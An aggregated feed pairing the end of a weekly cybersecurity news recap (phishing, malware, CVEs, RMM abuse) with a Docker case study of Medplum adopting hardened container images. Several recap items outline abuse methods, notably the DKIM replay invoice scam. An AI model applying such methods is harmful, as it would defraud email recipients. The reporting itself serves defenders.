    Poland's Ministry of Defence has banned Chinese cars, and other motor vehicles equipped with technology to record position, images, or sound, from entering protected military facilities due to national security concerns and to "limit the risk of access to sensitive data." The ban also extends to connecting work phones to infotainment systems in motor vehicles produced in China. The ban isn't permanent: the Defence Ministry has called for the development of a vetting process to allow carmakers to undergo a security assessment that, if passed, can allow their vehicles to enter protected facilities. "Modern vehicles equipped with advanced communication systems and sensors can collect and transmit data, so their presence in protected zones requires appropriate safety regulations," the Polish Army said. The measures introduced are preventive and comply with the practices of NATO countries and other allies to ensure the highest standards of defense infrastructure protection. They are part of a wider process of adapting security procedures to the changing technological environment and current requirements for the protection of critical infrastructure."

  14. DKIM replay fuels invoice scams

    Bad actors are abusing legitimate invoices and dispute notifications from trusted vendors, such as PayPal, Apple, DocuSign, and Dropbox Sign (formerly HelloSign), to bypass email security controls. "These platforms often allow users to enter a 'seller name' or add a custom note when creating an invoice or notification," Casey-owned INKY said. "Attackers abuse this functionality by inserting scam instructions and a phone number into those user-controlled fields. They then send the resulting invoice or dispute notice to an email address they control, ensuring the malicious content is embedded in a legitimate, vendor-generated message." Because these emails originate from a legitimate company, they bypass checks like Domain-based Message Authentication, Reporting and Conformance (DMARC). As soon as the legitimate email is received, the attacker proceeds to forward it to the intended targets, allowing the "authentic looking" message to land in the victims' inboxes. The attack is known as a DKIM replay attack.

  15. RMM abuse surges 277%

    A new report from Huntress has revealed that the abuse of Remote Monitoring and Management (RMM) software surged 277% year-over-year, accounting for 24% of all observed incidents. Threat actors have begun to increasingly favor these tools because they are ubiquitous in enterprise environments, and the trusted nature of the RMM software allows malicious activity to blend in with legitimate usage, making detection harder for defenders. They also offer increased stealth, persistence, and operational efficiency. "As cybercriminals built entire playbooks around these legitimate, trusted tools to drop malware, steal credentials, and execute commands, the use of traditional hacking tools plummeted by 53%, while remote access trojans and malicious scripts dropped by 20% and 11.7%, respectively," the company said.

  16. Texas targets China-linked tech firms

    Texas Attorney General Ken Paxton has sued TP-Link for "deceptively marketing its networking devices and allowing the Chinese Communist Party ('CCP') to access American consumers' devices in their homes." Paxton's lawsuit alleges that TP Link's products have been used by Chinese hacking groups to launch cyber attacks against the U.S. and that the company is subject to Chinese data laws, which it said require firms operating in the country to support its intelligence services by "divulging Americans' data." In a second lawsuit, Paxton also accused Anzu Robotics of misleading Texas consumers about the "origin, data practices, and security risks of its drones." Paxton's office described the company's products as "21st century Trojan horse linked to the CCP."

  17. MetaMask backdoor expands DPRK campaign

    The North Korea-linked campaign known as Contagious Interview is designed to target IT professionals working in cryptocurrency, Web3, and artificial intelligence sectors to steal sensitive data and financial information using malware such as BeaverTail and InvisibleFerret. However, recent iterations of the campaign have expanded their data theft capabilities by tampering with the MetaMask wallet extension (if it's installed) through a lightweight JavaScript backdoor that shares the same functionality as InvisibleFerret, according to security researcher Seongsu Park. "Through the backdoor, attackers instruct the infected system to download and install a fake version of the popular MetaMask cryptocurrency wallet extension, complete with a dynamically generated configuration file that makes it appear legitimate," Park said. "Once installed, the compromised MetaMask extension silently captures the victim's wallet unlock password and transmits it to the attackers’ command-and-control server, giving them complete access to cryptocurrency funds."

  18. Booking.com kits hit hotels, guests

    Bridewell has warned of a resurgence in malicious activity targeting the hotel and retail sector. "The primary motivation driving this incident is financial fraud, targeting two victims: hotel businesses and hotel customers, in sequential order," security researcher Joshua Penny said. "The threat actor(s) utilize impersonation of the Booking.com platform through two distinct phishing kits dedicated to harvesting credentials and banking information from each victim, respectively." It's worth noting that the activity shares overlap with a prior activity wave disclosed by Sekoia in November 2025, although the use of a dedicated phishing kit is a new approach by either the same or new operators.

  19. EPMM exploits enable persistent access

    The recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM) have been exploited by bad actors to establish a reverse shell, deliver JSP web shells, conduct reconnaissance, and download malware, including Nezha, cryptocurrency miners, and backdoors for remote access. The two critical vulnerabilities, CVE-2026-1281 and CVE-2026-1340, allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials. According to Palo Alto Networks Unit 42, the campaign has affected state and local government, healthcare, manufacturing, professional and legal services, and high technology sectors in the U.S., Germany, Australia, and Canada. "Threat actors are accelerating operations, moving from initial reconnaissance to deploying dormant backdoors designed to maintain long-term access even after organizations apply patches," the cybersecurity company said. In a related development, Germany's Federal Office for Information Security (BSI) has reported evidence of exploitation since the summer of 2025 and has urged organizations to audit their systems for indicators of compromise (IoCs) as far back as July 2025.

  20. AI passwords lack true randomness

    New research by Irregular has found that passwords generated directly by a large language model (LLM) may appear strong but are fundamentally insecure, as "LLMs are designed to predict tokens – the opposite of securely and uniformly sampling random characters." The artificial intelligence (AI) security company said it detected LLM-generated passwords in the real world as part of code development tasks instead of leaning on traditional secure password generation methods. "People and coding agents should not rely on LLMs to generate passwords," the company said. "LLMs are optimized to produce predictable, plausible outputs, which is incompatible with secure password generation. AI coding agents should be directed to use secure password generation methods instead of relying on LLM-output passwords. Developers using AI coding assistants should review generated code for hardcoded credentials and ensure agents use cryptographically secure methods or established password managers."

  21. PDF engine flaws enable account takeover

    Cybersecurity researchers have discovered more than a dozen vulnerabilities (CVE-2025-70401, CVE-2025-70402, and CVE-2025-66500) in popular PDF platforms from Foxit and Apryse, potentially allowing attackers to exploit them for account takeover, session hijacking, data exfiltration, and arbitrary JavaScript execution. "Rather than isolated bugs, the issues cluster around recurring architectural failures in how PDF platforms handle untrusted input across layers," Novee Security researchers Lidor Ben Shitrit, Elad Meged, and Avishai Fradlis said. "Several vulnerabilities were exploitable with a single request and affected trusted domains commonly embedded inside enterprise applications." The issues have been addressed by both Apryse and Foxit through product updates.

  22. Training labs expose cloud backdoors

    A "widespread" security issue has been discovered where security vendors inadvertently expose deliberately vulnerable training applications, such as OWASP Juice Shop, DVWA, bWAPP, and Hackazon, to the public internet. This can open organizations to severe security risks when they are executed from a privileged cloud account. "Primarily deployed for internal testing, product demonstrations, and security training, these applications were frequently left accessible in their default or misconfigured states," Pentera Labs said. "These critical flaws not only allowed attackers full control over the compromised compute engine but also provided pathways for lateral movement into sensitive internal systems. Violations of the principle of least privilege and inadequate sandboxing measures further facilitated privilege escalation, endangering critical infrastructure and sensitive organizational data." Further analysis has determined that threat actors are exploiting this blind spot to plant web shells, cryptocurrency miners, and persistence mechanisms on compromised systems.

  23. Evasion loader refines C2 stealth

    The malware loader known as Oyster (aka Broomstick or CleanUpLoader) has continued to evolve into early 2026, fine-tuning its C2 infrastructure and obfuscation methods, per findings from Sekoia. The malware is distributed mainly through fake websites that distribute installers for legitimate software like Microsoft Teams, with the core payload often deployed as a DLL for persistent execution. "The initial stage leverages excessive legitimate API call hammering and simple anti-debugging traps to thwart static analysis," the company said. "The core payload is delivered in a highly obfuscated manner. The final stage implements a robust C2 communication protocol that features a dual-layer server infrastructure and highly-customized data encoding."

  24. Stealer taunts researchers in code

    Noodlophile is the name given to an information-stealing malware that has been distributed via fake AI tools promoted on Facebook. Assessed to be the work of a threat actor based in Vietnam, it was first documented by Morphisec in May 2025. Since then, there have been other reports detailing various campaigns, such as UNC6229 and PXA Stealer, orchestrated by Vietnamese cybercriminals. Morphisec's latest analysis of Noodlophile has revealed that the threat actor "padded the malware with millions of repeats of a colorful Vietnamese phrase translating to 'f*** you, Morphisec,'" suggesting that the operators were not thrilled about getting exposed. "Not just to vent frustration over disrupted campaigns, but also to bloat the file and crash AI-based analysis tools that are based on the Python disassemble library – dis.dis(obj)," security researcher Michael Gorelik said.

  25. Crypto library RCE risk patched

    The OpenSSL project has patched a stack buffer overflow flaw that can lead to remote code execution attacks under certain conditions. The vulnerability, tracked as CVE-2025-15467, resides in how the library processes Cryptographic Message Syntax data. Threat actors can use CMS packets with maliciously crafted AEAD parameters to crash OpenSSL and run malicious code. CVE-2025-15467 is one of 12 issues that were disclosed by AISLE late last month. Another high-severity vulnerability is CVE-2025-11187, which could trigger a stack-based buffer overflow due to a missing validation.

  26. Machine accounts expand delegation risk

    New research from Silverfort has cleared a "common assumption" that Kerberos delegation -- which allows a service to request resources or perform actions on behalf of a user -- applies not just to human users, but also to machine accounts as well. In other words, a computer account can be delegated on behalf of highly privileged machine identities such as domain controllers. "That means a service trusted for delegation can act not just on behalf of other users, but also on behalf of machine accounts, the most critical non-human identities (NHIs) in any domain," Silverfort researcher Dor Segal said. "The risk is obvious. If an adversary can leverage delegation, it can act on behalf of sensitive machine accounts, which in many environments hold privileges equivalent to Domain Administrator." To counter the risk, it's advised to run "Set-ADAccountControl -Identity “HOST01$” -AccountNotDelegated $true" for each sensitive machine account.



from The Hacker News https://ift.tt/MVv5Ftb
via IFTTT

How Medplum Secured Their Healthcare Platform with Docker Hardened Images (DHI)

Special thanks to Cody Ebberson and the Medplum team for their open-source contribution and for sharing their migration experience with the community. A real-world example of migrating a HIPAA-compliant EHR platform to DHI with minimal code changes.

Healthcare software runs on trust. When patient data is at stake, security isn’t just a feature but a fundamental requirement. For healthcare platform providers, proving that trust to enterprise customers is an ongoing challenge that requires continuous investment in security posture, compliance certifications, and vulnerability management.

That’s why we’re excited to share how Medplum, an open-source healthcare platform serving over 20 million patients, recently migrated to Docker Hardened Images (DHI). This migration demonstrates exactly what we designed DHI to deliver: enterprise-grade security with minimal friction. Medplum’s team made the switch with just 54 lines of changes across 5 files—a near net-zero code change that dramatically improved their security posture.

Medplum is a headless EHR—the platform handles patient data, clinical workflows, and compliance so developers can focus on building healthcare apps. Built by and for healthcare developers, the platform provides:

  • HIPAA and SOC2 compliance out of the box
  • FHIR R4 API for healthcare data interoperability
  • Self-hosted or managed deployment options
  • Support for 20+ million patients across hundreds of practices

With over 500,000 pulls on Docker Hub for their medplum-server image, Medplum has become a trusted foundation for healthcare developers worldwide. As an open-source project licensed under Apache 2.0, their entire codebase—including Docker configurations—is publicly available on GitHub. This transparency made their DHI migration a perfect case study for the community.

Diagram of Medplum as headless EHR

Caption: Medplum is a headless EHR — the platform handles patient data, clinical workflows, and compliance so developers can focus on building healthcare apps.

Medplum is developer-first. It’s not a plug-and-play low-code tool—it’s designed for engineering teams that want a strong FHIR-based foundation with full control over the codebase.

The Challenge: Vulnerability Noise and Security Toil

Healthcare software development comes with unique challenges. Integration with existing EHR systems, compliance with regulations like HIPAA, and the need for robust security all add complexity and cost to development cycles.

“The Medplum team found themselves facing a challenge common to many high-growth platforms: “Vulnerability Noise.” Even with lean base images, standard distributions often include non-essential packages that trigger security flags during enterprise audits. For a company helping others achieve HIPAA compliance, every “Low” or “Medium” CVE (Common Vulnerability and Exposure) requires investigation and documentation, creating significant “security toil” for their engineering team.”

Reshma Khilnani

CEO, Medplum

Medplum addresses this by providing a compliant foundation. But even with that foundation, their team found themselves facing another challenge common to high-growth platforms: “Vulnerability Noise.”

Healthcare is one of the most security-conscious industries. Medplum’s enterprise customers—including Series C and D funded digital health companies—don’t just ask about security; they actively verify it. These customers routinely scan Medplum’s Docker images as part of their security due diligence.

Even with lean base images, standard distributions often include non-essential packages that trigger security flags during enterprise audits. For a company helping others achieve HIPAA compliance, every “Low” or “Medium” CVE requires investigation and documentation. This creates significant “security toil” for their engineering team.

The First Attempt: Distroless

This wasn’t Medplum’s first attempt at solving the problem. Back in November 2024, the team investigated Google’s distroless images as a potential solution.

The motivations were similar to what DHI would later deliver:

  • Less surface area in production images, and therefore less CVE noise
  • Smaller images for faster deployments
  • Simpler build process without manual hardening scripts

The idea was sound. Distroless images strip away everything except the application runtime—no shell, no package manager, minimal attack surface. On paper, it was exactly what Medplum needed.

But the results were mixed. Image sizes actually increased. Build times went up. There were concerns about multi-architecture support for native dependencies. The PR was closed without merging.

The core problem remained: many CVEs in standard images simply aren’t actionable. Often there isn’t a fix available, so all you can do is document and explain why it doesn’t apply to your use case. And often the vulnerability is in a corner of the image you’re not even using—like Perl, which comes preinstalled on Debian but serves no purpose in a Node.js application.

Fully removing these unused components is the only real answer. The team knew they needed hardened images. They just hadn’t found the right solution yet.

The Solution: Docker Hardened Images

When Docker made Hardened Images freely available under Apache 2.0, Medplum’s team saw an opportunity to simplify their security posture while maintaining compatibility with their existing workflows.

By switching to Docker Hardened Images, Medplum was able to offload the repetitive work of OS-level hardening—like configuring non-root users and stripping out unnecessary binaries—to Docker. This allowed them to provide their users with a “Secure-by-Default” image that meets enterprise requirements without adding complexity to their open-source codebase.

This shift is particularly significant for an open-source project. Rather than maintaining custom hardening scripts that contributors need to understand and maintain, Medplum can now rely on Docker’s expertise and continuous maintenance. The security posture improves automatically with each DHI update, without requiring changes to Medplum’s Dockerfiles.

“By switching to Docker Hardened Images, Medplum was able to offload the repetitive work of OS-level hardening—like configuring non-root users and stripping out unnecessary binaries—to Docker. This allowed their users to provide their users with a “Secure-by-Default” image that meets enterprise requirements without adding complexity to their open-source codebase.”

Cody Ebberson

CTO, Medplum

The Migration: Real Code Changes

The migration was remarkably clean. Previously, Medplum’s Dockerfile required manual steps to ensure security best practices. By moving to DHI, they could simplify their configuration significantly.

Let’s look at what actually changed. Here’s the complete server Dockerfile after the migration:

# Medplum production Dockerfile
# Uses Docker "Hardened Images":
# https://hub.docker.com/hardened-images/catalog/dhi/node/guides

# Supported architectures: linux/amd64, linux/arm64

# Stage 1: Build the application and install production dependencies
FROM dhi.io/node:24-dev AS build-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
ADD ./medplum-server-metadata.tar.gz ./
RUN npm ci --omit=dev && \
  rm package-lock.json

# Stage 2: Create the runtime image
FROM dhi.io/node:24 AS runtime-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
COPY --from=build-stage /usr/src/medplum/ ./
ADD ./medplum-server-runtime.tar.gz ./

EXPOSE 5000 8103

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

Notice what’s not there:

  • No groupadd or useradd commands — DHI runs as non-root by default
  • No chown commands — permissions are already correct
  • No USER directive — the default user is already non-privileged

Before vs. After: Server Dockerfile

Before (node:24-slim):

FROM node:24-slim
ENV NODE_ENV=production
WORKDIR /usr/src/medplum

ADD ./medplum-server.tar.gz ./

# Install dependencies, create non-root user, and set permissions
RUN npm ci && \
  rm package-lock.json && \
  groupadd -r medplum && \
  useradd -r -g medplum medplum && \
  chown -R medplum:medplum /usr/src/medplum

EXPOSE 5000 8103

# Switch to the non-root user
USER medplum

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

After (dhi.io/node:24):

FROM dhi.io/node:24-dev AS build-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
ADD ./medplum-server-metadata.tar.gz ./
RUN npm ci --omit=dev && rm package-lock.json

FROM dhi.io/node:24 AS runtime-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
COPY --from=build-stage /usr/src/medplum/ ./
ADD ./medplum-server-runtime.tar.gz ./

EXPOSE 5000 8103

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

The migration also introduced a cleaner multi-stage build pattern, separating metadata (package.json files) from runtime artifacts.

Before vs. After: App Dockerfile (Nginx)

The web app migration was even more dramatic:

Before (nginx-unprivileged:alpine):

FROM nginxinc/nginx-unprivileged:alpine

# Start as root for permissions
USER root

COPY <<EOF /etc/nginx/conf.d/default.conf
# ... nginx config ...
EOF

ADD ./medplum-app.tar.gz /usr/share/nginx/html
COPY ./docker-entrypoint.sh /docker-entrypoint.sh

# Manual permission setup
RUN chown -R 101:101 /usr/share/nginx/html && \
    chown 101:101 /docker-entrypoint.sh && \
    chmod +x /docker-entrypoint.sh

EXPOSE 3000

# Switch back to non-root
USER 101

ENTRYPOINT ["/docker-entrypoint.sh"]

After (dhi.io/nginx:1):

FROM dhi.io/nginx:1

COPY <<EOF /etc/nginx/nginx.conf
# ... nginx config ...
EOF

ADD ./medplum-app.tar.gz /usr/share/nginx/html
COPY ./docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 3000

ENTRYPOINT ["/docker-entrypoint.sh"]

Results: Improved Security Posture

After merging the changes, Medplum’s team shared their improved security scan results. The migration to DHI resulted in:

  • Dramatically reduced CVE count – DHI’s minimal base means fewer packages to patch
  • Non-root by default – No manual user configuration required
  • No shell access in production – Reduced attack surface for container escape attempts
  • Continuous patching – All DHI images are rebuilt when upstream security updates are available

For organizations that require stronger guarantees, Docker Hardened Images Enterprise adds SLA-backed remediation timelines, image customizations, and FIPS/STIG variants.

Most importantly, all of this was achieved with zero functional changes to the application. The same tests passed, the same workflows worked, and the same deployment process applied.

CI/CD Integration

Medplum also updated their GitHub Actions workflow to authenticate with the DHI registry:

- name: Login to Docker Hub
  uses: docker/login-action@v2.2.0
  with:
    username: $
    password: $

- name: Login to Docker Hub Hardened Images
  uses: docker/login-action@v2.2.0
  with:
    registry: dhi.io
    username: $
    password: $

This allows their CI/CD pipeline to pull hardened base images during builds. The same Docker Hub credentials work for both standard and hardened image registries.

The Multi-Stage Pattern for DHI

One pattern worth highlighting from Medplum’s migration is the use of multi-stage builds with DHI variants:

  1. Build stage: Use dhi.io/node:24-dev which includes npm/yarn for installing dependencies
  2. Runtime stage: Use dhi.io/node:24 which is minimal and doesn’t include package managers

This pattern ensures that build tools never make it into the production image, further reducing the attack surface. It’s a best practice for any containerized Node.js application, and DHI makes it straightforward by providing purpose-built variants for each stage.

Medplum’s Production Architecture

Medplum’s hosted offering runs on AWS using containerized workloads. Their medplum/medplum-server image—built on DHI base images—now deploys to production.

Medplum production architecture

Here’s how the build-to-deploy flow works:

  1. Build time: GitHub Actions pulls dhi.io/node:24-dev and dhi.io/node:24 as base images
  2. Push: The resulting hardened image is pushed to medplum/medplum-server on Docker Hub
  3. Deploy: AWS Fargate pulls medplum/medplum-server:latest and runs the hardened container

The deployed containers inherit all DHI security properties—non-root execution, minimal attack surface, no shell—because they’re built on DHI base images. This demonstrates that DHI works seamlessly with production-grade infrastructure including:

  • AWS Fargate/ECS for container orchestration
  • Elastic Load Balancing for high availability
  • Aurora PostgreSQL for managed database
  • ElastiCache for Redis caching
  • CloudFront for CDN and static assets

No infrastructure changes were required. The same deployment pipeline, the same Fargate configuration—just a more secure base image.

Why This Matters for Healthcare

For healthcare organizations evaluating container security, Medplum’s migration offers several lessons:

1. Eliminating “Vulnerability Noise”

The biggest win from DHI isn’t just security—it’s reducing the operational burden of security. Fewer packages means fewer CVEs to investigate, document, and explain to customers. For teams without dedicated security staff, this reclaimed time is invaluable.

2. Compliance-Friendly Defaults

HIPAA requires covered entities to implement technical safeguards including access controls and audit controls. DHI’s non-root default and minimal attack surface align with these requirements out of the box. For companies pursuing SOC 2 Type 2 certification—which Medplum implemented from Day 1—or HITRUST certification, DHI provides a stronger foundation for the technical controls auditors evaluate.

3. Reduced Audit Surface

When security teams audit container configurations, DHI provides a cleaner story. Instead of explaining custom hardening scripts or why certain CVEs don’t apply, teams can point to Docker’s documented hardening methodology, SLSA Level 3 provenance, and independent security validation by SRLabs. This is particularly valuable during enterprise sales cycles where customers scan vendor images as part of due diligence.

4. Practicing What You Preach

For platforms like Medplum that help customers achieve compliance, using hardened images isn’t just good security—it’s good business. When you’re helping healthcare organizations meet regulatory requirements, your own infrastructure needs to set the example.

5. Faster Security Response

With DHI Enterprise, critical CVEs are patched within 7 days. For healthcare organizations where security incidents can have regulatory implications, this SLA provides meaningful risk reduction—and a concrete commitment to share with customers.

Conclusion

Medplum’s migration to Docker Hardened Images demonstrates that improving container security doesn’t have to be painful. With minimal code changes—54 additions and 52 deletions—they achieved:

  • Secure-by-Default images that meet enterprise requirements
  • Automatic non-root execution
  • Dramatically reduced CVE surface
  • Simplified Dockerfiles with no manual hardening scripts
  • Less “security toil” for their engineering team
  • A stronger compliance story for enterprise customers

By offloading OS-level hardening to Docker, Medplum can focus on what they do best—building healthcare infrastructure—while their security posture improves automatically with each DHI update.

For a platform with 500,000+ Docker Hub pulls serving healthcare organizations worldwide, this migration shows that DHI is ready for production workloads at scale. More importantly, it shows that security improvements can actually reduce operational burden rather than add to it.

For platforms helping others achieve compliance, practicing what you preach matters. With Docker Hardened Images, that just got a lot easier.

Ready to harden your containers? Explore the Docker Hardened Images documentation or browse the free DHI catalog to find hardened versions of your favorite base images.

Resources



from Docker https://ift.tt/FrB17Ve
via IFTTT